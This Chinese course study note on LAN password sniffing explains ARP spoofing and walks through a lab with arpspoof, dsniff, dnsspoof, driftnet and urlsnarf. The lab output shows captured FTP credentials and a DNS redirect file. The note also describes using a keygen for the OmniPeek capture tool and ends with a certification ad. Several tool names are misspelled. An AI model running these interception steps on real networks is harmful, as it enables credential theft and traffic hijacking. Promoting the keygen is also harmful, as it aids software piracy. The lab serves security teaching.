1. 程式人生 > >【安全牛學習筆記】密碼嗅探

【安全牛學習筆記】密碼嗅探

security+ 信息安全 密碼

密碼嗅探

二、三層地址

- IP網絡到網絡

- MAC主機到主機

交換機與HUB

- HUB全端口轉發

- 交換機根據學習地址轉發

- 混雜模式抓包

【課外拓展】局域網密碼嗅探器,只需在自己的電腦上運行便可獲取局域網中任意一臺電腦的賬號密碼,支持交換機環境下的局域網目前支持嗅探POP3、FTP、SMTP、NNTP、IMAP、TELNET、HTTP、IRC協議中的密碼,軟件在線升級,同時還提供眾多局域網管理工具軟件

密碼嗅探

Arp協議

- 免費ARP

- 基於廣播學習

- 以太網、ARP

- 基於、響應相對獨立

- 基於傳聞的協議

【課外拓展】地址解析協議,即ARP(Address Resolution Protocol),是根據IP地址獲取物理地址的一個TCP/IP協議。主機發送信息時將包含目標IP地址的ARP請求廣播到網絡上的所有主機,並接收返回消息,以此確定目標的物理地址;收到返回消息後將該IP地址和物理地址存入本機ARP緩存中並保留一定時間,下次請求時直接查詢ARP緩存以節約資源。地址解析協議是建立在網絡中各個主機互相信任的基礎上的,網絡上的主機可以自主發送ARP應答消息,其他主機收到應答報文時不會檢測該報文的真實性就會將其記入本機ARP緩存;由此攻擊者就可以向某一主機發送偽ARP應答報文,使其發送的信息無法到達預期的主機或到達錯誤的主機,這就構成了一個ARP欺騙。ARP命令可用於查詢本機ARP緩存中IP地址和MAC地址的對應關系、添加或刪除靜態對應關系等。相關協議有RARP、代理ARP。NDP用於在IPv6中代替地址解析協議。

Omnipeek

Omnipeek 是出自WildPackets的著名的抓包軟件。

概述

編輯

其功能與Sniffer Pro有相似之處,但是經過多年的發展,其開發環境已經從VC++轉移到了C#平臺。

註;WildPackets是一家全球知名的軟件公司,公司成立的目標在於針對復雜的網絡環境,提供維護、除錯及最佳化等工作的方案。而其開發的產品能夠提供各個階段的IT人員很容易就各種異質網絡及網絡通訊協定,執行管理、監控、分析、除錯及最佳化的工作。

關於公司

自 1990 起,,Wildpackets就已經成功推出故障分析方案 (Fault analysis solutions),為全球各大型企業提供了既可靠又具穩定性的網絡系統。由桌面計算機到數據中心 (Data Center),從無線局域網(Wireless LAN) 到千兆骨幹網絡(Gigabit backbones),無論是企業的內部網絡或者是分布式網絡的互連,Wildpackets 都能夠為企業快速發現和處理影響網絡的問題。全球超過5000名的客戶正在使用 Wildpackets 的產品,協助他們解決網絡系統的問題,從而提高網絡系統的性能,這些客戶涵蓋了財富1000強公司中的80%。

關於Omni

Omni平臺實現了從單一控制臺進行全網範圍的分析與故障診斷,包括廣域網、無線網絡。結合Omni DNX分布式引擎、專家分析系統,使用Omni的OmniPeek控制臺能夠並發、獨立監控分析多個網段,管理員可以快速恢復業務系統,最大化網絡可用時間。Omni平臺非常容易進行部署、管理、擴展,是企業值得擁有的網絡分析與故障診斷的解決方案。

基本介紹

OmniPeek 提供統一分析除錯網絡之管理介面,OmniPeek 讓網絡之管理者能透過統一之介面同時分析多個網段之網絡狀況,更進而分析底層之網絡狀況,以快速辨識問題的功能。基於WildPackets屢獲殊榮的EtherPeek NX技術,Omni3 包含了OmniPeek控制臺、分布式Peek DNX引擎。這些組件無縫的結合工作可以透視復雜的分布式網絡。 OmniPeek OmniPeek將WildPackets的EtherPeek NX產品的本地分析能力擴展到遠程網段。OmniPeek擁有EtherPeek NX所有受歡迎的特點功能,包括: · 基於信息包流的專家分析系統和應用分析 ·交互式節點圖 · 完整的七層協議解碼 · 應用響應時間(ART)分析 · 安全功能 · 監控與報表 · RMON分布式分析

OmniPeek同樣有能力連接到遠程運行多種應用的引擎。運行在Omni3 引擎上的首要應用是Peek DNX(Distributed Network eXpert分布式網絡專家)。為了顯示遠程網段信息,OmniPeek從Peek DNX收集統計數據並進行相關分析。OmniPeek控制臺的界面與操作方式都與EtherPeek NX相同:非常易於使用,諸如"選擇相關數據包”等內嵌功能以及可客戶化的界面。OmniPeek也用來配置遠程引擎,包括過濾、報告、和專家系統等設置。只有在用戶需要解碼、分析或者本地保存數據包內容時,數據包文件才會被傳送到OmniPeek。

選擇一個好用的抓包軟件很重要,OmniPeek不但具有信息包流的專家分析系統和應用分析,完整的七層協議解碼,應用響應時間(ART)分析以及互式節點圖等功能,同時還可以為您提供安全功能,與監控功能。有了OmniPeek,您就可以更好的進行抓包工作了。

omnipeek 7.9.1是出自WildPackets的著名的抓包軟件。其功能與Sniffer Pro有相似之處,但是經過多年的發展,其開發環境已經從VC++轉移到了C#平臺。

OmniPeek擁有EtherPeek NX所有受歡迎的特點功能,包括基於信息包流的專家分析系統和應用分析,交互式節點圖,完整的七層協議解碼,應用響應時間(ART)分析,安全功能,監控與報表,RMON分布式分析!

monipeek註冊機,已經測試過有的5.0、6.0、6.1、6.5、7.5的版本都可以註冊,會被認為是病毒,這個不解釋。

使用方法:

1、在Product的下拉框中選中OmniEngine Enterprise

2、Product Version中選擇對應的版本,比如你是6.5的版本就輸入65 是7.5的版本就輸入75即可。

3、看上以上說明仍不會用的建議回爐重造

官方介紹:

OmniPeek 提供統一分析除錯網絡之管理介面,OmniPeek 讓網絡之管理者能透過統一之介面同時分析多個網段之網絡狀況,更進而分析底層之網絡狀況,以快速辨識問題的功能。基於WildPackets屢獲殊榮的EtherPeek NX技術,Omni3 包含了OmniPeek控制臺、分布式Peek DNX引擎。這些組件無縫的結合工作可以透視復雜的分布式網絡。 OmniPeek OmniPeek將WildPackets的EtherPeek NX產品的本地分析能力擴展到遠程網段。

OmniPeek同樣有能力連接到遠程運行多種應用的引擎。運行在Omni3 引擎上的首要應用是Peek DNX(Distributed Network eXpert分布式網絡專家)。為了顯示遠程網段信息,OmniPeek從Peek DNX收集統計數據並進行相關分析。OmniPeek控制臺的界面與操作方式都與EtherPeek NX相同:非常易於使用,諸如"選擇相關數據包”等內嵌功能以及可客戶化的界面。OmniPeek也用來配置遠程引擎,包括過濾、報告、和專家系統等設置。只有在用戶需要解碼、分析或者本地保存數據包內容時,數據包文件才會被傳送到OmniPeek。

OmniPeek擁有EtherPeek NX所有受歡迎的特點功能:

· 基於信息包流的專家分析系統和應用分析

·交互式節點圖 · 完整的七層協議解碼

· 應用響應時間(ART)分析

· 安全功能

· 監控與報表

· RMON分布式分析!

NEW Capture----->Adntere----->local machine: RENBOX(本地連接)----->確定

Start Capture

C:\User\w7>arp -d

C:\User\w7>ping 192.168.1.1

Send----->Set Send Packet //編輯內容

C:\User\w7>192.168.1.110

C:\User\w7>arp -a

接口:192.168.1.115 --- 0xb

Internet 地址 物理地址 類型

192.168.1.1 14-75-90-21-4f-56 動態

192.168.1.110 38-00-27-db-h2-af 動態

224.0.0.2 01-00-5e-00-00-16 靜態

[email protected]:~# arp -an

? (192.168.1.115) at 08:00:27:19:91:2e [ether] on eth0

? (192.168.1.1) at 08:00:27:19:91:2e [ether] on eth0

[email protected]:~# ping 192.168.1.1

PING 192.168.1.1 {192.168.1.1) 56(64) bytes of data.

^C

... 192.168.1.1 ping statistics ...

3 packets transmitted, 0 received, 100% packet loss, time 2010ms

[email protected]:~# arp -d 192.168.1.1

密碼嗅探

手動修改數據包實現ARP欺騙

arpspoof

- echo 1 > /proc/sys/net/ipv4/ip_forward

- arpspoof -t 1.1.1.12 -r 1.1.1.1

網絡嗅探

- dirftnet -i eth0 -a -d tempdir -s

- dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts

- urlsnarf -i eth0

- webspy -i eth0 1.1.1.10

- dnsiff -i eth0 -m

/usr/share/dsniff/dsniff.services

[email protected]:~# arp -t 192.168.1.115 -r 192.168.1.11 //實現雙向欺騙

[email protected]:~# cat /proc/sys/net/ipv4/ip_forword

0

[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward

[email protected]:~# cat /proc/sys/net/ipv4/ip_forword

1

ip.addr eq 192.168.1.115

[email protected]:~# dirftnet -i eth0

[email protected]:~# dirftnet -i eth0 -a -d /tmp -s

[email protected]:~# webspy -i eth0

Version: 2.4

Usage: webspy [-i interface | -p pcapfile] host

[email protected]:~# webspy -i eth0 192.168.1.115

websyp: not running on display :1

openURL(http://58.63.137.200/(

webspy: not running on display :1

[email protected]:~# openvas-stop

Stopping OpenVas Services

[email protected]:~# urlsnarf -i eth0

[email protected]:~# dsniff -h

Version: 2.4

Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]

[-f services] [-t trigger[,...]] [-r|-w savefile]

[expression]

[email protected]:~# dnsiff -i eth0 -m

dsniff: listening on eth0

--------------------

04/25/16 12:32:27 tcp 192.168.1.115.49889 -> 106.251.6.6.21 (ftp)

USER ftpuser1

PASS ftppassweord123

C:\user\w7>ftp

ftp> o 106.251.6.6

連接到106.251.6.6

220 FTP Server 1.2.4 <FTPD>

用戶<106.251.6.6:<none>>: user

331 Password required for ftpuserl

密碼:

530 Login incorrect.

登錄失敗

ftp>quit

221 Goodbye.

[email protected]:~# vi /usr/share/dnsiff/dnsspoof.hosts

192.168.1.1 *.taobao.com

192.168.1.1 *.google.com

192.168.1.1 *.youtbe.com

[email protected]:~# dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts

dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.110]

192.168.1.115.63606 > 124.207.160.106.53: 24110+ A? www.taobao.com

192.168.1.115.63606 > 124.207.160.106.53: 24110+ A? www.taobao.com

192.168.1.115.63606 > 124.207.160.106.53: 3976+ A? www.google.com

192.168.1.115.63606 > 124.207.160.106.53: 3976+ A? www.google.com

192.168.1.115.63606 > 124.207.160.106.53: 22049+ A? www.youtube.com

192.168.1.115.63606 > 124.207.160.106.53: 22049+ A? www.youtube.com

[email protected]:~# netstat -panut | grep 53

該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂

Security+認證為什麽是互聯網+時代最火爆的認證?


牛妹先給大家介紹一下Security+


Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。

Security+認證如此火爆的原因?

原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

原因二: IT運維人員工作與翻身的利器。

在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。

本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1971232

【安全牛學習筆記】密碼嗅探